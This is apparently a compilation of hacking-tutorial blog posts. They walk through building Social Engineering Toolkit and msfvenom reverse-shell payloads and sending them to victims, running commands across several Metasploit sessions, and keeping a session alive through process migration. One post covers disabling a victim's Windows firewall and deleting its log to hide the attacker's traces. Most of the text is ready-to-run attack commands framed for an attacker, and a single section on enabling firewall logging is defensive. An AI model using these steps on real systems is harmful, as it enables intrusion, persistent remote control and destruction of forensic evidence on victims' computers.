Capture VNC Session of Remote PC using Settoolkit

Today in this article we are going to compromise the target through VNC payload attack. It is a very simple method for beginners.

In this tutorial, we will learn how to create a VNC payload using Social Engineering Toolkit. We will try to achieve VNC shell of victim’s PC.

Let’s Start!!!

Open a terminal in Kali Linux, and type “setoolkit” on it to start the Social Engineering Toolkit Framework.

Select the first option to choose from the list of Social-Engineering Attacks.

Press '1'

To proceed further we will choose "Create a Payload and Listener" option.

Press '4'

This will show an arsenal of different payloads. As in this article our focus is VNC, hence we will select the VNC payload.

Press '3'

Next Step requires an IP address on which the payload listener is to be started. In our case it is 192.168.1.109(attacker's IP) and after that it will ask for the port for reverse listener. In our case it will be 4444

After setting up this, it starts generating VNC payload and save it under highlighted path. Explore /root/.set/payload.exe. Send the payload.exe file to the target.

Further it will ask to start payload listener Type "yes" and hit "Enter" this will start loading the Metasploit Framework.

After loading the Metasploit Framework, it runs the multi handler automatically; Now once the victim clicks on the payload file sent by the attacker, attacker will get a VNC shell.

Great!!!!

Our VNC attack using set toolkit is successful and we received the victim's VNC

shell on our system.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.

First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall

Type dir to observe the present directory of firewall.

Dir

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.

type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.

To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.

Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log

Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC

type pfirewall.log

How to Enable and Monitor Firewall Log in Windows PC

LETS START!!!

Let have a look where you will learn more about firewall security. Open windows firewall then select advance setting on the left side under control panel home.

 Here we are at windows firewall advance setting; explore its property tab present on the right side of window’s frame.

Now you can see the local computer property dialog box has been opened, here select the private profile option.

Here another dialog box will get appear in front of you to configure private profile for firewall.

Only we need to manipulate two things in this profile without disturbing other settings. Change “NO (default)” into “YES” for log dropped packets and log successful connection as shown in given screenshot. At last click on OK.

Now again we are at advance security setting of firewall here bring your cursor down toward monitoring option.  From screenshot you can see window frame for firewall monitoring where it contains general and logging setting.  As we want to read firewall logs therefore now click on the blue link given as file name under logging setting.

GREAT!!! Finally we can read firewall log and can investigate firewall traffic in our network.

Run OS Command in Multiple Session in Metasploit

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterepreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.

 LET’s PROCEED!!!

First an attacker needs to create a payload and share it in the network with his targets, then start multi handler in metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.

Here you can see from given screenshot I have receive two sessions from different system.

msf exploit(handler) > sessions

In order to gather the information from both targeted system simultaneously I had used post exploitation which let an attack to execute same command for multiple sessions at a time.

This module executes an arbitrary command line

msf exploit(handler) > use post/multi/general/execute

msf post(execute) > set command ipconfig

msf post(execute) > set session 1

msf post(execute) >exploit

In given screenshot you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is 192.168.0.100 as result.

Then in next step I just need to change session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is 192.168.0.105 as result.

msf post(execute) > set session  2

msf post(execute) >exploit

Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START

Open the terminal in kali Linux and type following command to generate exe payload.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

Above command will create the raj.exe file on the Desktop now send this file to remote system for attack

Load metasploit framework and type following command to start the attack.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo

Now let check the process ID of our payload.

meterpreter> ps

From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.

Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.

meterpreter> kill 4960

But!!!  Still we have victim’s session which means raj.exe file migrate into new process ID.

meterpreter> sysinfo